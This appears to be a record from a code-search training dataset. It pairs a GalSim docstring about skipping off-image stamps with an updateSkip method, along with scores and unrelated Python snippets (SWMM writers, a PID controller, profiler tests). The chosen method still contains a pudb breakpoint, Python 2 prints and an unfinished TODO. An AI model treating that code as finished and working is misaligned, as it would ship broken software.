= get_image_processor(self._config.image_processor)", "def __init__(self):\n\n self.write_title = TitleWriter() # TITLE project title\n self.write_options = GeneralWriter() # OPTIONS analysis options\n self.write_report = ReportWriter() # REPORT output reporting instructions\n self.write_files = SectionWriter() # FILES interface file options\n self.write_files.SECTION_NAME = \"[FILES]\"\n self.write_files.section_type = Files\n self.write_backdrop = BackdropOptionsWriter() # BACKDROP bounding rectangle and file name of backdrop image\n self.write_map = MapOptionsWriter() # MAP map's bounding rectangle and units\n self.write_raingages = SectionWriterAsList(\"[RAINGAGES]\", RainGageWriter,\n \";;Name \\tFormat \\tInterval\\tSCF \\tSource \\n\"\n \";;--------------\\t---------\\t--------\\t--------\\t----------\")\n\n self.write_hydrographs = SectionWriterAsList(\"[HYDROGRAPHS]\", UnitHydrographWriter,\n \";;Hydrograph \\tRain Gage/Month \\tResponse\\tR \\tT \\tK \\tDmax \\tDrecov \\tDinit \\n\"\n \";;--------------\\t----------------\\t--------\\t--------\\t--------\\t--------\\t--------\\t--------\\t--------\")\n # unit hydrograph data used to construct RDII inflows\n\n self.write_evaporation = EvaporationWriter() # EVAPORATION evaporation data\n self.write_temperature = TemperatureWriter() # TEMPERATURE air temperature and snow melt data\n self.write_adjustments = AdjustmentsWriter() # ADJUSTMENTS monthly climate adjustments\n self.write_subcatchments = SectionWriterAsList(\"[SUBCATCHMENTS]\", SubcatchmentWriter,\n \";;Name \\tRain Gage \\tOutlet \\tArea \\t%Imperv \\tWidth \\t%Slope \\tCurbLen \\tSnowPack \\n\"\n \";;--------------\\t----------------\\t----------------\\t--------\\t--------\\t--------\\t--------\\t--------\\t----------------\")\n # basic subcatchment information\n\n self.write_subareas = SectionWriterAsList(\"[SUBAREAS]\", SubareaWriter,\n \";;Subcatchment \\tN-Imperv \\tN-Perv \\tS-Imperv \\tS-Perv \\tPctZero \\tRouteTo \\tPctRouted\\n\"\n \";;--------------\\t----------\\t------------\\t--------\\t----------\\t----------\\t----------\\t---------\")\n # subcatchment impervious/pervious sub-area data\n\n #self.write_infiltration = SectionWriterAsListOf(\"[INFILTRATION]\", SectionWriter, None)\n # write_infiltration is set in as_text based on the kind of infiltration being used in the project.\n\n self.write_lid_controls = SectionWriterAsList(\"[LID_CONTROLS]\", LIDControlWriter,\n \";;Name \\tType/Layer\\tParameters\\n\"\n \";;--------------\\t----------\\t----------\")\n # low impact development control information\n\n self.write_lid_usage = SectionWriterAsList(\"[LID_USAGE]\", LIDUsageWriter,\n \";;Subcatchment \\tLID Process \\tNumber \\tArea \\tWidth \\tInitSat \\tFromImp \\tToPerv \\tRptFile \\tDrainTo\\n\"\n \";;--------------\\t----------------\\t-------\\t----------\\t----------\\t----------\\t----------\\t----------\\t------------------------\\t----------------\")\n # assignment of LID controls to subcatchments\n\n self.write_aquifers = SectionWriterAsList(\"[AQUIFERS]\", AquiferWriter,\n \";;Aquifer \\tPhi \\tWP \\tFC \\tHydCon\\tKslope\\tTslope\\tUEF \\tLED \\tLGLR \\tBEL \\tWTEL \\tUZM \\tUEF Pat\\n\"\n \";;--------------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t-------\")\n # groundwater aquifer parameters\n\n self.write_groundwater = SectionWriterAsList(\"[GROUNDWATER]\", GroundwaterWriter,\n \";;Subcatchment \\tAquifer \\tNode \\tEsurf \\tA1 \\tB1 \\tA2 \\tB2 \\tA3 \\tDsw \\tEgwt \\tEbot \\tWgr \\tUmc \\n\"\n \";;--------------\\t----------------\\t----------------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\")\n # subcatchment groundwater parameters\n\n self.write_gwf = SectionWriterAsList(\"[GWF]\", GWFWriter,\n \";;Subcatchment \\tFlow \\tEquation\\n\"\n \";;-------------- \\t------- \\t--------\")\n # custom groundwater flow equations\n\n self.write_snowpacks = SectionWriterAsList(\"[SNOWPACKS]\", SnowPackWriter,\n \";;Name \\tSurface \\tParameters\\n\"\n \";;--------------\\t----------\\t----------\")\n # subcatchment snow pack parameters\n\n self.write_junctions = SectionWriterAsList(\"[JUNCTIONS]\", JunctionWriter,\n \";;Name \\tElevation \\tMaxDepth \\tInitDepth \\tSurDepth \\tAponded\\n\"\n \";;--------------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # junction node information\n\n self.write_outfalls = SectionWriterAsList(\"[OUTFALLS]\", OutfallWriter,\n \";;Name \\tElevation \\tType \\tStage Data \\tGated \\tRoute To\\n\"\n \";;--------------\\t----------\\t----------\\t----------------\\t--------\\t----------------\")\n # outfall node information\n\n self.write_dividers = SectionWriterAsList(\"[DIVIDERS]\", DividerWriter,\n \";;Name \\tElevation \\tDiverted Link \\tType \\tParameters\\n\"\n \";;--------------\\t----------\\t----------------\\t----------\\t----------\")\n # flow divider node information\n\n self.write_storage = SectionWriterAsList(\"[STORAGE]\", StorageWriter,\n \";;Name \\tElev. \\tMaxDepth \\tInitDepth \\tShape \\tCurve Name/Params \\tN/A-Pond\\tFevap \\tPsi \\tKsat \\tIMD\\n\"\n \";;--------------\\t--------\\t----------\\t-----------\\t----------\\t----------------------------\\t--------\\t--------\\t--------\\t--------\\t--------\")\n # storage node information\n\n self.write_conduits = SectionWriterAsList(\"[CONDUITS]\", ConduitWriter,\n \";;Name \\tFrom Node \\tTo Node \\tLength \\tRoughness \\tInOffset \\tOutOffset \\tInitFlow \\tMaxFlow\\n\"\n \";;--------------\\t----------------\\t----------------\\t----------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # conduit link information\n\n self.write_pumps = SectionWriterAsList(\"[PUMPS]\", PumpWriter,\n \";;Name \\tFrom Node \\tTo Node \\tPump Curve \\tStatus \\tStartup \\tShutoff\\n\"\n \";;--------------\\t----------------\\t----------------\\t----------------\\t--------\\t--------\\t--------\")\n # pump link information\n\n self.write_orifices = SectionWriterAsList(\"[ORIFICES]\", OrificeWriter,\n \";;Name \\tFrom Node \\tTo Node \\tType \\tOffset \\tQcoeff \\tGated \\tCloseTime\\n\"\n \";;--------------\\t----------------\\t----------------\\t------------\\t----------\\t----------\\t--------\\t----------\")\n # orifice link information\n\n self.write_weirs = SectionWriterAsList(\"[WEIRS]\", WeirWriter,\n \";;Name \\tFrom Node \\tTo Node \\tType \\tCrestHt \\tQcoeff \\tGated \\tEndCon \\tEndCoeff \\tSurcharge \\tRoadWidth \\tRoadSurf \\tCoeff. Curve\\n\"\n \";;--------------\\t----------------\\t----------------\\t------------\\t----------\\t----------\\t--------\\t--------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # weir link information\n\n self.write_outlets = SectionWriterAsList(\"[OUTLETS]\", OutletWriter,\n \";;Name \\tFrom Node \\tTo Node \\tOffset \\tType \\tQTable/Qcoeff \\tQexpon \\tGated\\n\"\n \";;--------------\\t----------------\\t----------------\\t----------\\t---------------\\t----------------\\t----------\\t--------\")\n # outlet link information\n\n self.write_xsections = SectionWriterAsList(\"[XSECTIONS]\", CrossSectionWriter,\n \";;Link \\tShape \\tGeom1 \\tGeom2 \\tGeom3 \\tGeom4 \\tBarrels \\tCulvert \\n\"\n \";;--------------\\t------------\\t----------------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # conduit, orifice, and weir cross-section geometry\n\n self.write_transects = TransectsWriter() # transect geometry for conduits with irregular cross-sections\n\n self.write_losses = SectionWriterAsList(\"[LOSSES]\", LossWriter,\n \";;Link \\tKentry \\tKexit \\tKavg \\tFlap Gate \\tSeepage \\n\"\n \";;--------------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # conduit entrance/exit losses and flap valves\n\n self.write_controls = ControlWriter()\n # rules that control pump and regulator operation\n\n self.write_events = SectionWriterAsList(\"[EVENTS]\", EventsWriter,\n \";;Start Date \\tEnd Date\\n\")\n # events\n\n self.write_landuses = SectionWriterAsList(\"[LANDUSES]\", LanduseWriter,\n \";; \\tSweeping \\tFraction \\tLast\\n\"\n \";;Name \\tInterval \\tAvailable \\tSwept\\n\"\n \";;--------------\\t----------\\t----------\\t----------\")\n # land use categories\n\n self.write_buildup = SectionWriterAsList(\"[BUILDUP]\", BuildupWriter,\n \";;Land Use \\tPollutant \\tFunction \\tCoeff1 \\tCoeff2 \\tCoeff3 \\tPer Unit\\n\"\n \";;--------------\\t----------------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # buildup functions for pollutants and land uses\n\n self.write_washoff = SectionWriterAsList(\"[WASHOFF]\", WashoffWriter,\n \";;Land Use \\tPollutant \\tFunction \\tCoeff1 \\tCoeff2 \\tSweepRmvl \\tBmpRmvl\\n\"\n \";;--------------\\t----------------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # washoff functions for pollutants and land uses\n\n self.write_pollutants = SectionWriterAsList(\"[POLLUTANTS]\", PollutantWriter,\n \";;Name \\tUnits \\tCrain \\tCgw \\tCrdii \\tKdecay \\tSnowOnly \\tCo-Pollutant \\tCo-Frac \\tCdwf \\tCinit\\n\"\n \";;--------------\\t------\\t----------\\t----------\\t----------\\t----------\\t----------\\t----------------\\t----------\\t----------\\t----------\")\n # pollutant information\n\n self.write_coverages = CoveragesWriter() # COVERAGES # assignment of land uses to subcatchments\n self.write_treatment = SectionWriterAsList(\"[TREATMENT]\", TreatmentWriter,\n \";;Node \\tPollutant \\tFunction\\n\"\n \";;--------------\\t----------------\\t--------\")\n # pollutant removal functions at conveyance system nodes\n\n self.write_inflows = SectionWriterAsList(\"[INFLOWS]\", DirectInflowWriter,\n \";;Node \\tConstituent \\tTime Series \\tType \\tMfactor \\tSfactor \\tBaseline\\tPattern\\n\"\n \";;--------------\\t----------------\\t----------------\\t--------\\t--------\\t--------\\t--------\\t--------\")\n # INFLOWS # external hydrograph/pollutograph inflow at nodes\n\n self.write_dwf = SectionWriterAsList(\"[DWF]\", DryWeatherInflowWriter,\n \";;Node \\tConstituent \\tBaseline \\tPatterns \\n\"\n \";;--------------\\t----------------\\t----------\\t----------\")\n # baseline dry weather sanitary inflow at nodes\n\n self.write_patterns = SectionWriterAsList(\"[PATTERNS]\", PatternWriter,\n \";;Name \\tType \\tMultipliers\\n\"\n \";;--------------\\t----------\\t-----------\")\n # PATTERNS periodic variation in dry weather inflow\n\n self.write_rdii = SectionWriterAsList(\"[RDII]\", RDIInflowWriter,\n \";;Node \\tUnit Hydrograph \\tSewer Area\\n\"\n \";;--------------\\t----------------\\t----------\")\n # rainfall-dependent I/I information at nodes\n\n self.write_loadings = InitialLoadingsWriter()\n # initial pollutant loads on subcatchments\n\n self.write_curves = SectionWriterAsList(\"[CURVES]\", CurveWriter,\n \";;Name \\tType \\tX-Value \\tY-Value \\n\"\n \";;--------------\\t----------\\t----------\\t----------\")\n # CURVES x-y tabular data referenced in other sections\n\n self.write_timeseries = SectionWriterAsList(\"[TIMESERIES]\", TimeSeriesWriter,\n \";;Name \\tDate \\tTime \\tValue\\n\"\n \";;--------------\\t----------\\t----------\\t----------\")\n # time series data referenced in other sections\n\n self.write_labels = SectionWriterAsList(\"[LABELS]\", LabelWriter,\n \";;X-Coord \\tY-Coord \\tLabel\")\n # X, Y coordinates, text, and font details of labels", "def __init__(self, config):\n super().__init__(config)\n\n # For NaMaster you need to pass the masks\n self.mask_files = self.config[\"tjpcov\"].get(\"mask_file\")\n self.mask_names = self.config[\"tjpcov\"].get(\"mask_names\")\n\n # Binning info is only needed if workspaces are not passed\n self.binning_info = self.config[\"tjpcov\"].get(\"binning_info\", None)\n\n # nside is needed if mask_files is a hdf5 file\n self.nside = self.config[\"tjpcov\"].get(\"nside\", None)\n\n # Read NaMaster specific options\n self.nmt_conf = self.config.get(\"NaMaster\", {})\n for k in [\"f\", \"w\", \"cw\"]:\n if k not in self.nmt_conf:\n self.nmt_conf[k] = {}\n\n # Read cache from input file. It will update the cache passed as an\n # argument of the different methods\n self.cache = self.config.get(\"cache\", {})", "def __init__(self,pid,temperatureController,clock,web,oled,feedingAPI,thirdBucketAPI):\n persFile = open(\"persistenceFile.txt\",\"r\") \n persFile.seek(0,0)\n self.values = persFile.readlines() #values = [P,I,D,threshold,maxerrors,errorgap,leveltoFeed]\n defaultP = float(self.values[0][:-2])\n defaultI = float(self.values[1][:-2])\n defaultD = float(self.values[2][:-2])\n defaultThreshold = float(self.values[3][:-2])\n defaultMaxErrors = int(self.values[4][:-2])\n defaultErrorGap = int(self.values[5][:-2])\n algaeLevelToFeed = int(self.values[6][:-2])\n persFile.close()\n \n self.temperatureController = temperatureController\n self.clock = clock\n self.pid = pid\n self.oled = oled\n self.feedingAPI = feedingAPI\n self.thirdBucketAPI = thirdBucketAPI\n self.temperatureController.set_pid_threshold(defaultThreshold)\n self.pid.set_P(defaultP)\n self.pid.set_I(defaultI)\n self.pid.set_D(defaultD)\n self.pid.set_goal(defaultGoal)\n self.pid.set_max_errors(defaultMaxErrors)\n self.pid.set_derivative_error_gap(defaultErrorGap)\n self.clock.add_flag(\"temp\", temperaturePeriod)\n self.clock.add_flag(\"coms1\", comPeriod)\n self.clock.add_flag(\"coms2\", comPeriod,int(comPeriod/2))\n self.clock.add_flag(\"oled\",oledPeriod)\n self.clock.add_flag(\"feedMussels\", feedingMusselsPeriod)\n self.clock.add_flag(\"feedAlgae\", feedingMusselsPeriod,int(feedingMusselsPeriod/2))\n self.clock.add_flag(\"pumpRestart\", pumpRestartPeriod)\n self.clock.add_flag(\"feedThirdBucket\", feedingThirdBucketPeriod)\n self.clock.add_flag(\"ReverseFeedThirdBucket\", feedingThirdBucketPeriod,int(feedingThirdBucketPeriod/2))\n self.feedingMussels = False\n self.sendingBackWater = False\n self.feedingThirdBucket = False\n self.sendingBackThirdBucketWater = False\n self.web = web \n self.previousAlgaeLevel = 0\n self.previousTempLevel = 0\n self.algaeLevelToFeed = algaeLevelToFeed\n self.poolPumpingAmount = poolPumpingAmount", "def init():\n \n # General parameters\n exp_path = '/home/laura/Documents/stacks tif/1705_regMovie.tif' # experimental tif stack (grayscale)\n bin_path = '/home/laura/Documents/stacks tif/1705/1705_binarizedMovie.tif' # binarized tif stack\n vect_path = '/home/laura/Documents/STAGE3/1705_NET/' # gpickle directory\n dest_path = '/home/laura/Documents/STAGE3/1705_NET/superposition' # output directory\n verbose = True\n debug = True\n invert = True \n main_params = [exp_path, bin_path, vect_path, dest_path, verbose, debug, invert]\n \n # Output options\n doImg = -1 # image index\n doStack = False \n doVideo = False \n compress = 3 # advice: no more than 5\n output_params = [doImg, doStack, doVideo, compress]\n \n # Drawing options (colors as BGR)\n line = True # edges drawing\n line_color = (0, 255, 0) # green \n line_size = 1 \n apex_color = (0, 0, 255) # red\n apex_size = 5\n node_color = (255, 0, 0) # blue\n node_size = 5\n body_color = (0, 255, 0) # green\n body_size = 3\n drawing_params = [line, line_color, line_size, apex_color, apex_size,\n node_color, node_size, body_color, body_size]\n \n return main_params, output_params, drawing_params", "def __init__(self, measurement, tags, fields, time_stamp):\n self.measurement = measurement\n self.tags = tags\n self.fields = fields\n self.time = time_stamp" ]
[ "0.5815659", "0.5406954", "0.53990644", "0.53855544", "0.5383662", "0.5338992", "0.5320965", "0.5303831", "0.5302118", "0.5297782", "0.52322584", "0.51910156", "0.51902056", "0.5185881", "0.5184995", "0.5149911", "0.5142809", "0.51350987", "0.51125443", "0.5085775", "0.5084318", "0.5083843", "0.50741166", "0.50733346", "0.5055613", "0.5020785", "0.501958", "0.5002097", "0.5001654", "0.5001007", "0.49937087", "0.49931908", "0.49715212", "0.49715167", "0.49703154", "0.49691698", "0.49682102", "0.4964391", "0.49627817", "0.4948408", "0.49387518", "0.4934652", "0.49333638", "0.49320552", "0.49223527", "0.4922147", "0.4919161", "0.4918922", "0.49082938", "0.48981136", "0.4893451", "0.48897916", "0.48868626", "0.4886587", "0.48854253", "0.48797482", "0.48721954", "0.48660684", "0.4863846", "0.48619848", "0.48556846", "0.4852245", "0.48511815", "0.4847874", "0.4842159", "0.48333865", "0.4824914", "0.4819786", "0.4818314", "0.4810998", "0.48106608", "0.48071736", "0.48060837", "0.48057252", "0.4798714", "0.47960815", "0.47820234", "0.47802177", "0.47799873", "0.47776425", "0.47738954", "0.47738954", "0.47738954", "0.47738954", "0.47738954", "0.47727278", "0.4769976", "0.47663876", "0.47646332", "0.47639558", "0.47590575", "0.47581345", "0.4753262", "0.47491702", "0.47469714", "0.47376508", "0.473677", "0.47332147", "0.47323075", "0.47291434" ]
0.64838976
0
Before drawing the profile, see whether this object can be trivially skipped. The base method checks if the object is completely off the main image, so the intersection bounds will be undefined. In this case, don't bother drawing the postage stamp for this object. prof The profile to draw. image The image onto which to draw the profile (which may be None). method The method to use in drawImage. offset The offset to apply when drawing. config The configuration dict for the stamp field. base The base configuration dict. logger If given, a logger object to log progress. whether to skip drawing this object.
def updateSkip(self, prof, image, method, offset, config, base, logger): # NOTE: There are currently unresolved issues with the image size checking of chromatic # objects. For now, we ignore any possible speed increases and skip the check. # if isinstance(prof, galsim.ChromaticObject): # return False if prof is not None and base.get('current_image',None) is not None: if image is None: prof = base['wcs'].toImage(prof, image_pos=base['image_pos']) # NOTE: Old version: # N = prof.getGoodImageSize(1.) if isinstance(prof, galsim.GSObject): N = prof.getGoodImageSize(1.) elif isinstance(prof, galsim.ChromaticObject): # TODO: Finish implementation # return False pudb.set_trace() # Find the suggested image size for each object given the choice of scale, and use the # maximum just to be safe. print '\nprof.original = {}'.format(prof.original) print '\nprof.original.obj_list = {}'.format(prof.original.obj_list) # print '\nprof.objlist = {}'.format(prof.original.obj_list) obj_list = prof.original.obj_list possible_im_sizes = [] for obj in obj_list: print '\n obj : {}'.format(obj) possible_im_sizes.append([ ob.getGoodImageSize(1.) for ob in obj]) print 'possible_im_sizes : {}'.format(possible_im_sizes) N = np.max(possible_im_sizes) N += 2 + int(np.abs(offset.x) + np.abs(offset.y)) bounds = galsim._BoundsI(1,N,1,N) else: bounds = image.bounds # Set the origin appropriately stamp_center = base['stamp_center'] if stamp_center: bounds = bounds.shift(stamp_center - bounds.center) else: bounds = bounds.shift(base.get('image_origin',galsim.PositionI(1,1)) - galsim.PositionI(bounds.xmin, bounds.ymin)) overlap = bounds & base['current_image'].bounds if not overlap.isDefined(): logger.info('obj %d: skip drawing object because its image will be entirely off ' 'the main image.', base['obj_num']) return True return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def draw(self, prof, image, method, offset, config, base, logger, **kwargs):\n # ... draw prof onto the given image (making a new Image if necessary)\n if prof is None:\n return image\n else:\n logger = galsim.config.LoggerWrapper(logger)\n # Setup the kwargs to pass to drawImage\n # (Start with any additional kwargs given as extra kwargs to DrawBasic and add to it.)\n kwargs['image'] = image\n kwargs['offset'] = offset\n kwargs['method'] = method\n if 'wmult' in config and 'wmult' not in kwargs: # pragma: no cover\n kwargs['wmult'] = galsim.config.ParseValue(config, 'wmult', base, float)[0]\n if 'wcs' not in kwargs and 'scale' not in kwargs:\n kwargs['wcs'] = base['wcs'].local(image_pos = base['image_pos'])\n if method == 'phot' and 'rng' not in kwargs:\n kwargs['rng'] = galsim.config.GetRNG(config, base, logger, \"method='phot'\")\n\n # Check validity of extra phot options:\n max_extra_noise = None\n if 'n_photons' in config and 'n_photons' not in kwargs:\n if method != 'phot':\n raise AttributeError('n_photons is invalid with method != phot')\n if 'max_extra_noise' in config:\n logger.warning(\n \"Both 'max_extra_noise' and 'n_photons' are set in config dict, \"+\n \"ignoring 'max_extra_noise'.\")\n kwargs['n_photons'] = galsim.config.ParseValue(config, 'n_photons', base, int)[0]\n elif 'max_extra_noise' in config:\n max_extra_noise = galsim.config.ParseValue(config, 'max_extra_noise', base, float)[0]\n if method != 'phot' and max_extra_noise is not None:\n raise AttributeError('max_extra_noise is invalid with method != phot')\n\n if 'poisson_flux' in config and 'poisson_flux' not in kwargs:\n if method != 'phot':\n raise AttributeError('poisson_flux is invalid with method != phot')\n kwargs['poisson_flux'] = galsim.config.ParseValue(config, 'poisson_flux', base, bool)[0]\n\n if max_extra_noise is not None and 'max_extra_noise' not in kwargs:\n if max_extra_noise < 0.:\n raise ValueError(\"image.max_extra_noise cannot be negative\")\n if 'image' in base and 'noise' in base['image']:\n noise_var = galsim.config.CalculateNoiseVariance(base)\n else:\n raise AttributeError(\"Need to specify noise level when using max_extra_noise\")\n if noise_var < 0.:\n raise ValueError(\"noise_var calculated to be < 0.\")\n max_extra_noise *= noise_var\n kwargs['max_extra_noise'] = max_extra_noise\n\n if logger.isEnabledFor(logging.DEBUG):\n # Don't output the full image array. Use str(image) for that kwarg.\n alt_kwargs = dict([(k,str(kwargs[k]) if isinstance(kwargs[k],galsim.Image) else kwargs[k])\n for k in kwargs])\n logger.debug('obj %d: drawImage kwargs = %s',base.get('obj_num',0), alt_kwargs)\n logger.debug('obj %d: prof = %s',base.get('obj_num',0),prof)\n try:\n # NOTE: Old version:\n # image = prof.drawImage(**kwargs)\n if isinstance(prof, galsim.GSObject):\n image = prof.drawImage(**kwargs)\n elif isinstance(prof, galsim.ChromaticObject):\n bp = {}\n for key in (self._req_bp_fields+self._opt_bp_fields):\n try:\n bp[key] = config['bandpass'][key]\n except KeyError:\n bp[key] = None\n\n bandpass = galsim.Bandpass(blue_limit=bp['blue_limit'], red_limit=bp['red_limit'],\n wave_type=bp['wave_type'], throughput=bp['throughput'],\n zeropoint=bp['zeropoint'])\n\n image = prof.drawImage(bandpass=bandpass, **kwargs)\n\n except Exception as e: # pragma: no cover\n logger.debug('obj %d: prof = %r', base.get('obj_num',0), prof)\n raise\n return image", "def testDiagonalProfile(self):\n # Use Plot backend widget to submit mouse events\n widget = self.plot.getWidgetHandle()\n\n self.plot.addImage(\n numpy.arange(100 * 100).reshape(100, -1))\n\n for method in ('sum', 'mean'):\n with self.subTest(method=method):\n # 2 positions to use for mouse events\n pos1 = widget.width() * 0.4, widget.height() * 0.4\n pos2 = widget.width() * 0.6, widget.height() * 0.6\n\n # Trigger tool button for diagonal profile mode\n self.toolBar.lineAction.trigger()\n\n # draw profile line\n widget.setFocus(qt.Qt.OtherFocusReason)\n self.mouseMove(widget, pos=pos1)\n self.qWait(100)\n self.mousePress(widget, qt.Qt.LeftButton, pos=pos1)\n self.qWait(100)\n self.mouseMove(widget, pos=pos2)\n self.qWait(100)\n self.mouseRelease(widget, qt.Qt.LeftButton, pos=pos2)\n self.qWait(100)\n\n manager = self.toolBar.getProfileManager()\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n roi = manager.getCurrentRoi()\n self.assertIsNotNone(roi)\n roi.setProfileLineWidth(3)\n roi.setProfileMethod(method)\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n curveItem = roi.getProfileWindow().getCurrentPlotWidget().getAllCurves()[0]\n if method == 'sum':\n self.assertTrue(curveItem.getData()[1].max() > 10000)\n elif method == 'mean':\n self.assertTrue(curveItem.getData()[1].max() < 10000)\n\n # Remove the ROI so the profile window is also removed\n roiManager = manager.getRoiManager()\n roiManager.removeRoi(roi)\n self.qWait(100)", "def test_profiler(self):\n\n a = np.arange(16, dtype=np.float32)\n b = np.arange(16, dtype=np.float32)\n p = profiler.Profile()\n try:\n p.enable()\n dot(a, b)\n p.disable()\n stats = pstats.Stats(p).strip_dirs()\n self.assertIn(('test_profiler.py', 7, 'dot'), stats.stats)\n finally:\n # make sure the profiler is deactivated when this test is done so as not to\n # pollute any other tests\n p.disable()\n del p", "def merge_profile(prof1, prof2):\r\n new_t = []\r\n new_l = []\r\n new_sub_profile = []\r\n #merge common(same object) opt\r\n for l in set(prof1[0]).intersection(set(prof2[0])):\r\n idx1 = prof1[0].index(l)\r\n idx2 = prof2[0].index(l)\r\n new_t.append(prof1[1][idx1] +\r\n prof2[1][idx2])\r\n new_l.append(l)\r\n if hasattr(l, 'merge_profile'):\r\n assert len(prof1[6][idx1]) == len(prof2[6][idx2])\r\n new_sub_profile.append(l.merge_profile(prof1[6][idx1],\r\n prof2[6][idx2]))\r\n else:\r\n new_sub_profile.append(None)\r\n\r\n # merge not common opt\r\n from theano.compat.six import StringIO\r\n for l in set(prof1[0]).symmetric_difference(set(prof2[0])):\r\n #The set trick above only work for the same object optimization\r\n #It don't work for equivalent optimization.\r\n #So we try to merge equivalent optimization here.\r\n new_l_names = [o.name for o in new_l]\r\n if l.name in new_l_names:\r\n idx = new_l_names.index(l.name)\r\n io1 = StringIO()\r\n io2 = StringIO()\r\n l.print_summary(io1)\r\n new_l[idx].print_summary(io2)\r\n if io1.read() == io2.read():\r\n if l in prof1[0]:\r\n p = prof1\r\n else:\r\n p = prof2\r\n new_t[idx] += p[1][p[0].index(l)]\r\n if hasattr(l, 'merge_profile'):\r\n assert len(p[6][p[0].index(l)]) == \\\r\n len(new_sub_profile[idx])\r\n new_sub_profile[idx] = l.merge_profile(\r\n new_sub_profile[idx], p[6][p[0].index(l)])\r\n else:\r\n new_sub_profile[idx] = None\r\n continue\r\n if l in prof1[0]:\r\n p = prof1\r\n else:\r\n p = prof2\r\n new_t.append(p[1][p[0].index(l)])\r\n idx = p[0].index(l)\r\n new_l.append(l)\r\n new_sub_profile.append(p[6][idx])\r\n\r\n new_opt = SeqOptimizer(*new_l)\r\n #We need to assert based on the name as we merge also based on\r\n #the name.\r\n assert set([l.name for l in prof1[0]]).issubset(\r\n set([l.name for l in new_l]))\r\n assert set([l.name for l in prof2[0]]).issubset(\r\n set([l.name for l in new_l]))\r\n assert len(new_t) == len(new_opt) == len(new_sub_profile)\r\n return (new_opt, new_t, prof1[2] + prof2[2],\r\n prof1[3] + prof2[3],\r\n -1, -1, new_sub_profile, [])", "def test_profiler(self):\n cmdline = [\n \"starfish\",\n \"--profile\",\n \"noop\",\n ]\n if cmdline[0] == 'starfish':\n coverage_cmdline = [\n \"coverage\", \"run\",\n \"-p\",\n \"--source\", \"starfish\",\n \"-m\", \"starfish.starfish\",\n ]\n coverage_cmdline.extend(cmdline[1:])\n cmdline = coverage_cmdline\n env = os.environ.copy()\n env[PROFILER_NOOP_ENVVAR] = \"\"\n subprocess.check_call(cmdline, env=env)", "def plot_visco_profiles(pointsh5, skip=slice(None,None,1), xscale=1e3, yscale=1e-2, tscale=3.1536e7, adjustRadial=False, benchmark=[], title=None):\n\tplt.figure()\n\n\tcoords,data,number,times = pu.load_h5_visco(pointsh5)\n\n\t#x = 1e3*np.loadtxt(points,usecols=[0]) # output_points2.txt\n\t#y = np.zeros_like(x)\n\tx = coords[:,0]\n\ty = np.zeros_like(x)\n\n\t# NOTE: plot elastic solution by passing dictionary as showelastic\n\t# Plot analytic elastic solution (t=0)\n\t#print(benchmark)\n\tif len(benchmark)>=1:\n\t\tur = zeros_like(x)\n\t\tuz = np.zeros_like(x)\n\t\tfor b in benchmark:\n\t\t\turi,uzi = m.calc_mogi_dp(x,y,**params)\n\t\t\tur += uri\n\t\t\tuz += uzi\n\t\tplt.plot(x*xscale,uz*yscale,'ko',label='benchmark')\n\n\t# Convert units\n\t#ur = np.hypot(data[:,:,0], data[:,:,1]) #assume progiles are along EW profile\n\tur = data[:,:,0]\n\tuz = data[:,:,2]\n\tx = x / xscale\n\tur = ur / yscale #cm\n\tuz = uz / yscale #cm\n\ttimes = times / tscale\n\t#times = times / 8.64e4 #days\n\t#times = times / 31536000 #years\n\n\t#plots = np.arange(0,times.size,skip)\n\t#print(plots.size)\n\t#way to cycle through markers if plotting many lines\n\t#marker = itertools.cycle(['o','^','s','D']) #plot(marker=marker.next() iterates list)\n\t#way to use gradually changing colors from a colormap\n\t#color = plt.cm.jet(1.0*i/plots.size)\n\tindplots = np.arange(times.size-1)\n\tprint(indplots)\n\tindplots = indplots[skip]\n\tprint(indplots)\n\tfor i in indplots:\n\t\tline, = plt.plot(x, uz[i], color=plt.cm.jet(1.0*i/indplots[-1]), label='{:.1f}'.format(times[i]))\n\t\tplt.plot(x, ur[i], ls='dashed', color=line.get_color())\n\t#print uz[i]\n\t#print uz[i-1]\n\n\tif title:\n\t\tplt.title(title)\n\telse:\n\t\tplt.title(pointsh5)\n\n\tplt.axhline(color='k',linestyle='dashed')\n\tplt.xlabel('Distance [{}]'.format(get_unit(xscale)))\n\tplt.ylabel('Displacement [{}]'.format(get_unit(yscale)))\n\tplt.show()\n\tplt.legend(title='{}'.format(get_unit(tscale)))\n\tplt.grid()", "def testAlignedProfile(self):\n # Use Plot backend widget to submit mouse events\n widget = self.plot.getWidgetHandle()\n for method in ('sum', 'mean'):\n with self.subTest(method=method):\n # 2 positions to use for mouse events\n pos1 = widget.width() * 0.4, widget.height() * 0.4\n pos2 = widget.width() * 0.6, widget.height() * 0.6\n\n for action in (self.toolBar.hLineAction, self.toolBar.vLineAction):\n with self.subTest(mode=action.text()):\n # Trigger tool button for mode\n action.trigger()\n # Without image\n self.mouseMove(widget, pos=pos1)\n self.mouseClick(widget, qt.Qt.LeftButton, pos=pos1)\n\n # with image\n self.plot.addImage(\n numpy.arange(100 * 100).reshape(100, -1))\n self.mousePress(widget, qt.Qt.LeftButton, pos=pos1)\n self.mouseMove(widget, pos=pos2)\n self.mouseRelease(widget, qt.Qt.LeftButton, pos=pos2)\n\n self.mouseMove(widget)\n self.mouseClick(widget, qt.Qt.LeftButton)\n\n manager = self.toolBar.getProfileManager()\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break", "def test_remove_spawning_profile():\n center = Coordinates(1 , 1)\n radius = 10\n speed_limit = 20\n\n i = Intersection(center, radius, speed_limit)\n\n default_driver = DriverProfile(\"Default\", 8, 2, 2, 0, 30, 3, 1)\n default_vehicle = VehicleProfile(\"Default\", 5, 15, 2, 2, 1000, 65)\n default_spawn = SpawningProfile(\"Default\", default_driver, default_vehicle)\n spawn2 = SpawningProfile(\"spawn2\", 